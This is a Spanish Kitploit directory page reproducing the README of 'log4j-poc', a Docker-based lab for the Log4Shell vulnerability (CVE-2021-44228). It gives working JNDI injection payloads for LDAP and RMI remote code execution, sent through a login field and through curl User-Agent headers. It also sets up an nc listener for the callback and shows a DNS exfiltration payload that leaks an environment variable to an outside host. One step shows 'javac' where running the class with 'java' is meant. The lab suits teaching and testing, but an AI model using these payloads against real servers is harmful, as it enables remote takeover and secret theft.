Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-poc — Una demo de exploit RCE LDAP basada en Docker para CVE-2021-44228 Log4Shell | Kitploit
Herramientas/GitHubGitHub/cyberxml/log4j-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubcyberxml/log4j-poc

log4j-poc

Una demo de exploit RCE LDAP basada en Docker para CVE-2021-44228 Log4Shell

Ver Repositorio
72335hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

log4j-poc

Un exploit LDAP RCE para CVE-2021-44228 Log4Shell

Descripción

El servidor Tomcat 8 de demostración en el puerto 8080 tiene una aplicación vulnerable (log4shell) desplegada en él y el servidor también es vulnerable mediante ataques de user-agent.

La aplicación de exploit remoto en esta demo está basada en la encontrada en https://github.com/kozmer/log4j-shell-poc

Este servidor Tomcat de demostración (Tomcat 8.5.3, Java 1.8.0u51) ha sido reconfigurado para usar Log4J2 para el registro de eventos: una configuración no estándar.

Ahora hay disponible un servidor Bitnami más nuevo en el puerto 8888. También está configurado para el registro de Log4J2 y ejecuta Tomcat 9.0.55 y OpenJDK 11.0.13.

El exploit RMI contra el servidor Tomcat 9 / Java 11 se describe aquí: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (3 de enero de 2019) por Michael Stepankin

El script de detección comprobará vulnerabilidades de user-agent y proviene de aquí: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

Requisitos previos

Este código requiere Docker y Docker Compose

Instalación

root@kitploit:~
git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to addjust the environment variables as needed.
#   POC_ADDR is the address of the cve-poc container
#   LISTENER_ADDR is the address of the 'nc' listener e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener
# This can be the local IP of the docker hostmachine.
docker-compose build
Descargar herramienta

Ejecutar la demo de ataque a la aplicación web

  1. Configura tu listener de docker en la primera terminal
    1. nc -lv 10.10.10.31 9001
  2. Inicia los contenedores de docker en una segunda terminal
    1. docker-compose up
  3. Navega a la aplicación web en el puerto 8080
    1. Navega a http://10.10.10.31:8080/log4shell
      1. Introduce el nombre de usuario: admin
      2. Introduce la contraseña: password
      3. Pulsa el botón "login"
      4. Verás la pantalla de bienvenida
    2. Vuelve al inicio de sesión en http://10.10.10.31:8080/log4shell
      1. Introduce el nombre de usuario ${jndi:ldap://172.16.238.11:1389/a}
      2. Pulsa el botón "login"
      3. Comprueba la conexión en tu listener de nc

Ejecutar una demo de ataque de user-agent

  1. Configura tu listener de docker en la primera terminal
    1. nc -lv 10.10.10.31 9001
  2. Inicia los contenedores de docker en una segunda terminal
    1. docker-compose up
  3. En una tercera terminal, ejecuta lo siguiente. La segunda IP es el host de docker
    1. curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell

Ejecutar una demo de exfiltración DNS en la versión reciente de Java 11

  1. Inicia los contenedores de docker en una terminal
    1. docker-compose up
  2. En una segunda terminal, ejecuta lo siguiente. La IP es la dirección IP del host de docker
    1. curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
  3. El servidor web vulnerable intentará hacer una consulta TXT en la IP indicada. Ver log4j-dns_exfil.pcap

Ejecutar una demo de RMI RCE en la versión reciente de Java 11

Estoy teniendo problemas con el argumento de línea de comandos para el objetivo de ping. Así que tienes que compilarlo tú mismo.

Compilar

  1. Inicia los contenedores de docker en una terminal
    1. docker-compose up
  2. En otra terminal, inicia sesión en el cve-poc
    1. docker exec -it log4j-poc_cve-poc_1 /bin/bash
  3. Termina la instancia de RMIServerPOC en ejecución
  4. Cambia al directorio rmi-poc
    1. cd /home/user/rmi-poc
  5. Edita RMIServerPOC.java para cambiar 10.10.10.31 por tu objetivo de ping
  6. Recompila
    1. javac -cp catalina.jar:. RMIServerPOC.java
  7. Ejecuta el servidor
    1. javac -cp catalina.jar:. RMIServerPOC 127.0.0.1

Ejecutar la demo de RMI RCE

  1. Inicia los contenedores de docker en una terminal
    1. docker-compose up
  2. En una segunda terminal, ejecuta lo siguiente. La IP es la dirección IP del host de docker
    1. curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
  3. El servidor web vulnerable descargará una clase maliciosa serializada desde el servidor RMI para una clase que ya existe en el entorno de Tomcat.
  4. Esto hará ping a la dirección IP definida en la sección de compilación.

Detectar vulnerabilidad de UA

  1. cd scripts
  2. python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
  3. tendrás que matar el proceso, todavía no estoy seguro de por qué se cuelga